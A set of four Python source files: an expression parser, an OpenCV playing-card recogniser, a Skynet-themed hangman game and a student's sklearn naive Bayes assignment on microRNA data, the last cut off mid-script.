+{"seq_id":"306874128","text":"from Wpp.expr.Node import Node\nfrom Wpp.expr.operations import binOps, unOps, ternaryPrior, fnArgsPrior, squareBracketPrior\n\ndef scanLexems(lexems, pos, terminators, context):\n\t\"Анализ списка лексем. На выходе единственный узел и позиция последней использованной лекскмы\"\n\tstack = []\n\tstep = 1\n\twhile pos < len(lexems):\n\t\tvalue, lexemType, constType = lexems[pos]\n\t\t# Проверка на команду - завершитель\n\t\tif lexemType == 'cmd' and value in terminators:\n\t\t\tbreak\n\t\tpos += 1\n\t\tif stack and stack[-1].isSpecMinus(lexemType, constType):\n\t\t\t# Специальный случай - замена унарного минуса к числовой константе на отрицательное число \n\t\t\tstack[-1] = Node('arg', lexemType, '-'+value, constType, True)\n\t\telif lexemType == 'const' or lexemType == 'id':\n\t\t\tstack.append(Node('arg', lexemType, value, constType, True))\n\t\telif lexemType == 'cmd':\n\t\t\tif stack and stack[-1].bArgument:\n\t\t\t\tif value == '?':\n\t\t\t\t\tprior = ternaryPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('ternar', lexemType, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\targ2, pos = scanLexems(lexems, pos, {':'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\t\topNode.args.append(arg2)\n\t\t\t\telif value == '(':\n\t\t\t\t\t# Вызов функции\n\t\t\t\t\tprior = fnArgsPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('call', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\tif lexems[pos][0] == ')':\n\t\t\t\t\t\tpos += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\twhile True:\n\t\t\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {',', ')'}, context)\n\t\t\t\t\t\t\ttermCmd, termType, termX = lexems[pos]\n\t\t\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\t\t\tpos += 1\n\t\t\t\t\t\t\tif termCmd == ')':\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\telif value == '[':\n\t\t\t\t\tprior = squareBracketPrior\n\t\t\t\t\t# optimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('index', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {']'}, context)\n\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\tpos += 1\n\t\t\t\telse:\n\t\t\t\t\t# Бинарный оператор\n\t\t\t\t\tprior = binOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid binary operation \"%s\"' % (value))\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('binop', lexemType, value, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\tstack.append(opNode)\n\t\t\telse:\n\t\t\t\t# Унарный оператор\n\t\t\t\tif value == '(':\n\t\t\t\t\t# Скобки для группировки операций\n\t\t\t\t\topNode, pos = scanLexems(lexems, pos, {')'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\telif value == '[':\n\t\t\t\t\t# Значение типа массива\n\t\t\t\t\topNode, pos = createArray(lexems, pos, context)\n\t\t\t\telse:\n\t\t\t\t\tprior = unOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid unary operation ' + value)\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('unop', lexemType, value, prior=prior)\n\t\t\t\tstack.append(opNode)\n\tif pos == len(lexems):\n\t\tcontext.throwError('No end of expression found')\n\toptimizeStack(stack, 100, context)\n\tif len(stack) != 1:\n\t\t# Если узлы не сошлись в один, то это неправильное выражение. 
Типа x 1\n\t\tcontext.throwError('Invalid expression: [' + ', '.join([str(i) for i in stack])+']')\n\treturn (stack[0], pos)\n\ndef createArray(lexems, pos, context):\n\tvalue = Node('array', 'array', bArgument = True)\n\tdivider = ''\n\twhile divider != ']':\n\t\tnode, pos = scanLexems(lexems, pos, {',', ']'}, context)\n\t\tdivider, t, x = lexems[pos]\n\t\tvalue.args.append(node)\n\t\tpos += 1\n\treturn value, pos\n\ndef optimizeStack(stack, prior, context):\n\tif not stack:\n\t\treturn\n\n\twhile True:\n\t\tlast = stack.pop()\n\t\tif not last.bArgument:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\tif not stack:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top = stack.pop()\n\t\tif op.bArgument:\n\t\t\tcontext.throwError('Expected operation instead of '+str(op))\n\t\tif op.prior > prior:\n\t\t\tstack.append(op)\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top.args.append(last)\n\t\top.bArgument = True\n\t\tstack.append(op)\n","sub_path":"src1/Wpp/expr/scanLexems.py","file_name":"scanLexems.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"173111121","text":"#\n# Based on: https://github.com/EdjeElectronics/OpenCV-Playing-Card-Detector\n#\nimport json\nimport os\n\nimport cv2\nimport numpy as np\n\nfrom poke_visor.classes.card_detector.poker_card_info import PokerCardInfo\nfrom poke_visor.classes.card_detector.train_ranks import TrainRanks\nfrom poke_visor.classes.card_detector.train_suits import TrainSuits\n# Adaptive threshold levels\nfrom poke_visor.enums.card_rank_enum import CardRank\nfrom poke_visor.enums.card_suit_enum import CardSuit\n\n# Constants #\n\nBKG_THRESH = 70\nCARD_THRESH = 30\n\n# Width and height of card corner, where rank and suit are\nCORNER_WIDTH = 64\nCORNER_HEIGHT = 160\n\n# Dimensions of rank train images\nRANK_WIDTH = 70\nRANK_HEIGHT = 125\n\n# Dimensions of suit train images\nSUIT_WIDTH = 70\nSUIT_HEIGHT = 100\n\nRANK_DIFF_MAX = 2000\nSUIT_DIFF_MAX = 700\n\nCARD_MAX_AREA = 240000\nCARD_MIN_AREA = 12500\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef _load_settings():\n global CARD_MAX_AREA, CARD_MIN_AREA\n\n if os.path.isfile(\"config.json\"):\n with open(\"config.json\", \"r\") as file:\n config_json = json.loads(file.read())\n if \"card-detector\" in config_json:\n settings = json.loads(file.read())[\"card-detector\"]\n CARD_MAX_AREA = settings[\"card-max-area\"]\n CARD_MIN_AREA = settings[\"card-min-area\"]\n\n\n_load_settings()\n\n\ndef load_ranks(filepath):\n \"\"\"Loads rank images from directory specified by filepath. Stores\n them in a list of Train_ranks objects.\"\"\"\n\n train_ranks = []\n\n for rank in CardRank:\n if rank == CardRank.unknown:\n continue\n\n train_ranks.append(TrainRanks())\n last = len(train_ranks) - 1\n train_ranks[last].rank = rank\n filename = str(rank.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card rank file not found : {filepath + filename}\")\n\n train_ranks[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_ranks\n\n\ndef load_suits(filepath):\n \"\"\"Loads suit images from directory specified by filepath. 
Stores\n them in a list of Train_suits objects.\"\"\"\n\n train_suits = []\n\n for suit in CardSuit:\n if suit == CardSuit.unknown:\n continue\n\n train_suits.append(TrainSuits())\n last = len(train_suits) - 1\n train_suits[last].suit = suit\n filename = str(suit.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card suit file not found : {filepath + filename}\")\n\n train_suits[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_suits\n\n\ndef preprocess_image(image):\n \"\"\"Returns a grayed, blurred, and adaptively thresholded camera image.\"\"\"\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (3, 3), 0)\n\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 5, 2)\n return thresh\n\n\ndef find_cards(thresh_image):\n \"\"\"Finds all card-sized contours in a thresholded camera image.\n Returns the number of cards, and a list of card contours sorted\n from largest to smallest.\"\"\"\n\n # Find contours and sort their indices by contour size\n cnts, hier = cv2.findContours(thresh_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n index_sort = sorted(range(len(cnts)), key=lambda i_: cv2.contourArea(cnts[i_]), reverse=True)\n\n # If there are no contours, do nothing\n if len(cnts) == 0:\n return [], []\n\n # Otherwise, initialize empty sorted contour and hierarchy lists\n cnts_sort = []\n hier_sort = []\n cnt_is_card = np.zeros(len(cnts), dtype=int)\n\n # Fill empty lists with sorted contour and sorted hierarchy. Now,\n # the indices of the contour list still correspond with those of\n # the hierarchy list. The hierarchy array can be used to check if\n # the contours have parents or not.\n for i in index_sort:\n cnts_sort.append(cnts[i])\n hier_sort.append(hier[0][i])\n\n # Determine which of the contours are cards by applying the\n # following criteria: 1) Smaller area than the maximum card size,\n # 2), bigger area than the minimum card size, 3) have no parents,\n # and 4) have four corners\n\n for i in range(len(cnts_sort)):\n size = cv2.contourArea(cnts_sort[i])\n peri = cv2.arcLength(cnts_sort[i], True)\n approx = cv2.approxPolyDP(cnts_sort[i], 0.01 * peri, True)\n\n if CARD_MAX_AREA > size > CARD_MIN_AREA and len(approx) == 4:\n cnt_is_card[i] = 1\n\n return cnts_sort, cnt_is_card\n\n\ndef preprocess_card(contour, image) -> PokerCardInfo:\n \"\"\"Uses contour to find information about the poker card. 
Isolates rank\n and suit images from the card.\"\"\"\n\n # Initialize new card_info object\n card_info = PokerCardInfo()\n\n card_info.contour = contour\n\n # Find perimeter of card and use it to approximate corner points\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.01 * peri, True)\n pts = np.float32(approx)\n\n # Find width and height of card\"s bounding rectangle\n x, y, w, h = cv2.boundingRect(contour)\n card_info.width, card_info.height = w, h\n\n # Find center point of card by taking x and y average of the four corners.\n average = np.sum(pts, axis=0) / len(pts)\n cent_x = int(average[0][0])\n cent_y = int(average[0][1])\n card_info.center = [cent_x, cent_y]\n\n # Warp card into 256x360 flattened image using perspective transform\n # noinspection PyTypeChecker\n warp = cv2.resize(_flattener(image, pts, w, h), (256, 360))\n\n # Grab corner of warped card image and do a 4x zoom\n corner = warp[0:CORNER_HEIGHT, 0:CORNER_WIDTH]\n corner_zoom = cv2.resize(corner, (0, 0), fx=4, fy=4)\n\n # Sample known white pixel intensity to determine good threshold level\n white_level = corner_zoom[corner_zoom.shape[0] - 1, int((CORNER_WIDTH * 4) / 2)]\n thresh_level = white_level - CARD_THRESH\n if thresh_level <= 0:\n thresh_level = 1\n _, poker_thresh = cv2.threshold(corner_zoom, thresh_level, 255, cv2.THRESH_BINARY_INV)\n\n # Split in to top and bottom half (top shows rank, bottom shows suit)\n rank = poker_thresh[0:round(CORNER_HEIGHT * 2), 0:CORNER_WIDTH * 4]\n suit = poker_thresh[round(CORNER_HEIGHT * 2):CORNER_HEIGHT * 4, 0:CORNER_WIDTH * 4]\n\n # Find rank contour and bounding rectangle, isolate and find largest contour\n rank_cnts, hier = cv2.findContours(rank, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n rank_cnts = sorted(rank_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker rank\n # image to match dimensions of the train rank image\n if len(rank_cnts) != 0:\n x1, y1, w1, h1 = cv2.boundingRect(rank_cnts[0])\n rank_roi = rank[y1:y1 + h1, x1:x1 + w1]\n rank_sized = cv2.resize(rank_roi, (RANK_WIDTH, RANK_HEIGHT), 0, 0)\n card_info.rank_img = rank_sized\n\n # Find suit contour and bounding rectangle, isolate and find largest contour\n suit_cnts, hier = cv2.findContours(suit, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n suit_cnts = sorted(suit_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker suit\n # image to match dimensions of the train suit image\n if len(suit_cnts) != 0:\n x2, y2, w2, h2 = cv2.boundingRect(suit_cnts[0])\n suit_roi = suit[y2:y2 + h2, x2:x2 + w2]\n suit_sized = cv2.resize(suit_roi, (SUIT_WIDTH, SUIT_HEIGHT), 0, 0)\n card_info.suit_img = suit_sized\n\n return card_info\n\n\ndef match_card(card, train_ranks, train_suits):\n \"\"\"Finds best rank and suit matches for the poker card. 
Differences\n the poker card rank and suit images with the train rank and suit images.\n The best match is the rank or suit image that has the least difference.\"\"\"\n\n best_rank_match_diff = 10000\n best_suit_match_diff = 10000\n best_rank_match_name = CardRank.unknown\n best_suit_match_name = CardSuit.unknown\n best_rank_name = CardRank.unknown\n best_suit_name = CardSuit.unknown\n\n # If no contours were found in poker card in preprocess_card function,\n # the img size is zero, so skip the differencing process\n # (card will be left as unknown)\n if (len(card.rank_img) != 0) and (len(card.suit_img) != 0):\n\n # Difference the poker card rank image from each of the train rank images,\n # and store the result with the least difference\n for t_rank in train_ranks:\n\n diff_img = cv2.absdiff(card.rank_img, t_rank.img)\n rank_diff = int(np.sum(diff_img) / 255)\n\n if rank_diff < best_rank_match_diff:\n best_rank_match_diff = rank_diff\n best_rank_name = t_rank.rank\n\n # Same process with suit images\n for t_suit in train_suits:\n\n diff_img = cv2.absdiff(card.suit_img, t_suit.img)\n suit_diff = int(np.sum(diff_img) / 255)\n\n if suit_diff < best_suit_match_diff:\n best_suit_match_diff = suit_diff\n best_suit_name = t_suit.suit\n\n # Combine best rank match and best suit match to get poker card\"s identity.\n # If the best matches have too high of a difference value, card identity\n # is still unknown\n if best_rank_match_diff < RANK_DIFF_MAX:\n best_rank_match_name = best_rank_name\n\n if best_suit_match_diff < SUIT_DIFF_MAX:\n best_suit_match_name = best_suit_name\n\n # Return the identity of the card and the quality of the suit and rank match\n return best_rank_match_name, best_suit_match_name, best_rank_match_diff, best_suit_match_diff\n\n\ndef draw_results(image, card):\n \"\"\"Draw the card name and contour on the camera image.\"\"\"\n\n x = card.center[0]\n y = card.center[1]\n\n rank_name = card.best_rank_match\n suit_name = card.best_suit_match\n\n # Draw card name twice, so letters have black outline\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n return image\n\n\ndef _flattener(image, pts, w, h):\n \"\"\"Flattens an image of a card into a top-down 200x300 perspective.\n Returns the flattened, re-sized, grayed image.\n See www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/\"\"\"\n temp_rect = np.zeros((4, 2), dtype=\"float32\")\n\n s = np.sum(pts, axis=2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=-1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n # Need to create an array listing points in order of\n # [top left, top right, bottom right, bottom left]\n # before doing the perspective transform\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n # If the card is \"diamond\" oriented, a different algorithm\n # has to be used to identify which point is top left, top right\n # bottom left, and bottom right.\n\n if 0.8 * h < w < 1.2 * h: # If 
card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n\n max_width = 200\n max_height = 300\n\n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [max_width - 1, 0], [max_width - 1, max_height - 1], [0, max_height - 1]], np.float32)\n m = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, m, (max_width, max_height))\n warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n\n return warp\n","sub_path":"application/poke_visor/logic/card_detector/card_detection_functions.py","file_name":"card_detection_functions.py","file_ext":"py","file_size_in_byte":13006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"66896693","text":"import random\nimport sys\nimport os\n\nclass HangMan:\n\n def __init__(self):\n self.capitals = []\n self.cap_name_output = []\n self.not_in_word = []\n self.cap_name = []\n self.choice = ' '\n self.type_letter = ' '\n self.type_word = ' '\n\n\n # importing capital cities from file, storing them in list,\n # choosing one of them radomly\n def make_capitals(self):\n with open(\"capitals.txt\", \"r\") as capital:\n for item in capital:\n self.capitals.append(item.replace('\\n', ''))\n capital.close()\n self.cap_name = list(random.choice(self.capitals))\n\n\n # filling another list with dashes and * if there is a space\n def make_dashes(self):\n for letter in self.cap_name:\n for n, i in enumerate(self.cap_name):\n if i == ' ':\n self.cap_name[n] = '*'\n if letter == '*':\n self.cap_name_output.append('*')\n else:\n self.cap_name_output.append('_ ')\n\n\n # chcecking player's lifes, close program when lifes reache\n def end_game(self,lifes):\n if lifes == 0:\n print('\\033[91m' + 'GAME OVER!' + '\\033[0m')\n sys.exit()\n\n\n #checking user input if it is letter or space\n def check_letter(self):\n while not len(self.type_letter) == 1:\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n while not self.type_letter.isalpha():\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n\n\n def letter(self,lifes):\n if self.not_in_word != []:\n print(\"Used letters: \" + ', '.join(self.not_in_word))\n if '_ ' in self.cap_name_output:\n self.type_letter = input('Type letter: ').upper()\n self.check_letter()\n if self.type_letter not in self.cap_name:\n self.not_in_word.append(self.type_letter)\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.game(lifes - 1)\n for letter, i in enumerate(self.cap_name):\n if i == self.type_letter:\n self.cap_name_output[letter] = self.type_letter\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if '_ ' not in self.cap_name_output:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n self.game(lifes)\n\n\n # checking if in entered word(s) is space and changing spaces for *\n # comparing typed word with capital name\n def word(self,lifes):\n self.type_word = list(input('Type word: ').upper())\n if ' ' in self.type_word:\n for n, i in enumerate(self.type_word):\n if i == ' ':\n self.type_word[n] = '*'\n if self.type_word == self.cap_name:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n else:\n self.game(lifes - 1)\n\n\n # asking user for input, runs appropriate function depending on input\n def game(self,lifes):\n print('\\nYou have', lifes, ' lifes.')\n self.end_game(lifes)\n self.choice = input('Would You like to guess a letter or whole word(s)? ').lower()\n if self.choice == 'letter' or self.choice == 'l':\n self.letter(lifes)\n elif self.choice == 'word' or self.choice == 'w':\n print('\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.word(lifes)\n else:\n print('You can chose only between letter or word, type again!')\n self.game(lifes)\n\n\n # user can set difficulty level, to determine number of lifes\n def levels(self):\n input_level = input('Do you chose EASY, MEDIUM or HARD level? 
').lower()\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if input_level == 'easy' or input_level == 'e':\n self.game(15)\n elif input_level == 'medium' or input_level == 'm':\n self.game(10)\n elif input_level == 'hard' or input_level == 'h':\n self.game(5)\n else:\n print('There no such level, type again!')\n self.levels()\n\n # star game function\n def start_game(self):\n start = input('Do sure you want start the game and save The World? There will be no return...(enter \"yes\" to continue) ').lower()\n if start == 'yes' or start == 'y':\n self.levels()\n else:\n sys.exit()\n\n def main(self):\n os.system('clear')\n print('\\033[93m' + 'Evil ' + '\\033[91m' + 'SKYNET' + '\\033[93m' + ''' is trying to take control over the world.\n Guess a names of European capital that are his targets and safe the world!\\n''' + '\\033[0m')\n self.make_capitals()\n self.make_dashes()\n self.start_game()\n self.levels\n\nnew_game = HangMan()\nnew_game.main()\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"421991313","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nDownload and install sklearn on your computer (e.g. download the Anaconda distribution) or \nuse a Jupyter notebook on Google Colab (free).\n Download the sample dataset assigData4.csv. This file has 1200 positive and 6000 negative samples. Each sample 215 features \n (assume the first feature is “feature 1” below). The final value on each line of the file is the class (1 = positive, \n 0 = negative) of that sample. These data represent features extracted from genomic windows that do (positive) and do not (negative) \n correspond to microRNA. Use Weka to do the following:\na) Data visualization:\ni. Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n Suggest you use the pandas library for this.\nii. Plot the distribution of feature 15 for the two classes on a single histogram. The seaborn library may be useful here.\niii. Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class. Again,\n the seaborn library is useful here.\nb) Preprocessing: sklearn implements several filter type (i.e. not wrapper type) feature selection methods.\ni. Describe the SelectKBest approach using the chi metric. (~50 words, don’t just copy)\nii. Run a different filter-type feature selection approach on your data (i.e. other than SelectKBest with chi).\niii.\n i. Briefly describe which and what parameters you used.\n ii. Summarize the results: how many features were selected and which features selected? If your method simply returns \n a ranked list of all 215 features, choose a subset by applying an arbitrary cutoff score to the ranked list. Describe \n your approach.\nc) Classification: using a naïve Bayes classifier:\ni. Which parameters must be set by the user (briefly describe their meaning)\nii. When creating a hold-out test set, what is stratified sampling and how is it applicable here? (~20 words)\niii. For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \nthe confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \nGenerate a ROC curve and a precision-recall curve.\niv. Repeat iii using your optimal feature set from b-iii) above.\nv. Which feature set led to the best performance? 
(discuss difference in observed performance metrics; ~50 words)\n\"\"\"\nimport sklearn as sk\nimport pandas as pa\nimport seaborn as se\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectPercentile, f_classif\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.naive_bayes import GaussianNB\nfrom train import get_train\nfrom get_accuracy import get_accuracy\n\n# Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n\nnames = []\nfor i in range(1,216):\n name = \"feature\" + str(i)\n names.append(name)\nnames.append('classes')\ndata = pa.read_csv('assigData4.csv',names = names)\n\n# Plot the distribution of feature 15 for the two classes on a single histogram.\n\nfeature15class0 = []\nfor j in range(0,7200):\n if data.classes[j] == 0:\n feature15class0.append(data.feature15[j])\nse.distplot(feature15class0, bins = 50, kde = False, label = \"class=0\")\nplt.legend()\nfeature15class1 = []\nfor k in range(0, 7200):\n if data.classes[k] == 1:\n feature15class1.append(data.feature15[k])\nse.distplot(feature15class1, color = 'red', bins = 50, kde = False, label = \"class=1\")\nplt.legend()\n\n# Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class\n\nplt.figure()\nse.scatterplot(x = \"feature3\", y = \"feature8\", data = data,hue='classes')\n\n#I use the SelectPercentile with f_classif method, which use chi2 , and then choose the features of\n#the highest percentile of the scores. the parameter : score_func=, percentile\n\nY = pa.Series(data.classes).values\ndataupdate = data.drop(columns = 'classes')\nX = dataupdate.values\nX_new = SelectPercentile(f_classif, percentile = 70)\nX_new.fit_transform(X,Y)\nselectedfeatureindices = X_new.get_support(indices = True)\na=[]\nfor l in list(range(len(selectedfeatureindices))):\n b = (\"feature\" + str(selectedfeatureindices[l] + 1))\n a.append(b)\nprint(a)\n\"\"\"I select 150 features, 'feature1', 'feature2', 'feature3', 'feature4', 'feature5',\n'feature6', 'feature7', 'feature8', 'feature9', 'feature10', 'feature11', 'feature12',\n'feature13', 'feature14', 'feature15', 'feature16', 'feature17', 'feature18', 'feature19',\n'feature20', 'feature21', 'feature22', 'feature23', 'feature24', 'feature25', 'feature26',\n'feature27', 'feature28', 'feature31', 'feature32', 'feature33', 'feature34', 'feature35',\n'feature36', 'feature37', 'feature38', 'feature39','feature40', 'feature41', 'feature42',\n'feature43', 'feature44', 'feature45', 'feature47', 'feature49', 'feature54', 'feature55',\n'feature56', 'feature59', 'feature60', 'feature61', 'feature65', 'feature66', 'feature67',\n'feature68', 'feature69', 'feature70', 'feature71', 'feature72', 'feature73', 'feature74',\n'feature75', 'feature76', 'feature77', 'feature78', 'feature79', 'feature80', 'feature84',\n'feature85', 'feature89', 'feature90', 'feature91', 'feature93', 'feature95', 'feature96',\n'feature97', 'feature98', 'feature99', 'feature100', 'feature103', 'feature104', 'feature105',\n'feature106', 'feature108', 'feature109', 'feature110', 'feature112', 'feature116', 'feature119',\n'feature120', 'feature121', 'feature122', 'feature123', 'feature124', 'feature126', 'feature129',\n'feature132', 'feature136', 'feature137', 'feature138', 'feature139', 'feature140', 'feature142',\n'feature143', 'feature145', 'feature146', 'feature147', 'feature148', 'feature149', 'feature150',\n'feature151', 'feature154', 'feature155', 
'feature156', 'feature157', 'feature159', 'feature161',\n'feature162', 'feature163', 'feature164', 'feature165', 'feature167', 'feature169', 'feature170',\n'feature171', 'feature172', 'feature173', 'feature174', 'feature175', 'feature178', 'feature179',\n'feature180', 'feature182', 'feature184', 'feature185', 'feature194', 'feature196', 'feature197',\n'feature200', 'feature201', 'feature202', 'feature203', 'feature204', 'feature209', 'feature210',\n'feature211', 'feature212', 'feature213', 'feature214', 'feature215'.\"\"\"\n\n# For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \n# the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \n# Generate a ROC curve and a precision-recall curve.\n\ndataarray = dataupdate.values\nclassarray = data.classes.values\nc = sk.model_selection.StratifiedShuffleSplit(n_splits = 1, test_size = 0.2)\nfor train_index, test_index in c.split(dataarray, classarray):\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\nX_train, X_test = dataarray[train_index], dataarray[test_index]\ny_train, y_test = classarray[train_index], classarray[test_index]\ngnb = GaussianNB()\ngnb.fit(X_train, y_train)\nscore = gnb.predict_proba(X_train)[:, 1]\ny_pred = sk.model_selection.cross_val_predict(gnb,X_train, y_train, groups = None, cv = 5, verbose = 2)\nconfusionmatrix = sk.metrics.confusion_matrix(y_train, y_pred)\nTP = confusionmatrix[1,1]\nFP = confusionmatrix[0,1]\nFN = confusionmatrix[1,0]\nTN = confusionmatrix[0,0]\nprint(\"confusion matrix is \",([TP,FP],[FN,TN]))\ntrainaccuracy, trainprecision, trainsensitivity, trainspecificity = get_train(TP, FP, TN, FN)\nprint(\"the accuracy is\", trainaccuracy)\nprint(\"the precision is\", trainprecision)\nprint(\"the sensitivity is\", trainsensitivity)\nprint(\"the trainspecificity is\", trainspecificity)\nfpr, tpr, thresholds = sk.metrics.roc_curve(y_train, score)\nplt.figure()\nplt.scatter(fpr,tpr)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPR\")\nplt.ylabel(\"trainTPR\")\nplt.show()\ny_score = gnb.predict_proba(X_train)\nprecision, recall, threshold = sk.metrics.precision_recall_curve(y_train,y_score[:,1])\nplt.figure()\nplt.plot(recall, precision)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecall')\nplt.ylabel('trainprecision')\nplt.show()\n\n#For the optimal feature set : Conduct a 5-fold cross-validation test. Provide \n#the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. 
\n#Generate a ROC curve and a precision-recall curve.\n\ndataarraynew=data[a].values\nclassarraynew=data.classes.values\ns = sk.model_selection.StratifiedShuffleSplit(n_splits=1, test_size=0.2)\nfor train_indexnew, test_indexnew in s.split(dataarraynew, classarraynew):\n print(\"TRAIN:\", train_indexnew, \"TEST:\", test_indexnew)\nX_trainnew, X_testnew = dataarraynew[train_indexnew], dataarraynew[test_indexnew]\ny_trainnew, y_testnew = classarraynew[train_indexnew], classarraynew[test_indexnew]\ngnbnew = GaussianNB()\ngnbnew.fit(X_trainnew,y_trainnew)\nscorenew = gnbnew.predict_proba(X_trainnew)[:, 1]\ny_prednew = sk.model_selection.cross_val_predict(gnbnew,X_trainnew, y_trainnew, groups=None, cv=5, verbose=2)\nconfusionmatrixnew = sk.metrics.confusion_matrix(y_trainnew, y_prednew)\nTPnew = confusionmatrixnew[1,1]\nFPnew = confusionmatrixnew[0,1]\nFNnew = confusionmatrixnew[1,0]\nTNnew = confusionmatrixnew[0,0]\nprint(\"confusion matrix is \",([TPnew,FPnew],[FNnew,TNnew]))\ntrainaccuracynew,trainprecisionew, trainsensitivitynew, trainspecificitynew = get_train(TPnew, FPnew, TNnew, 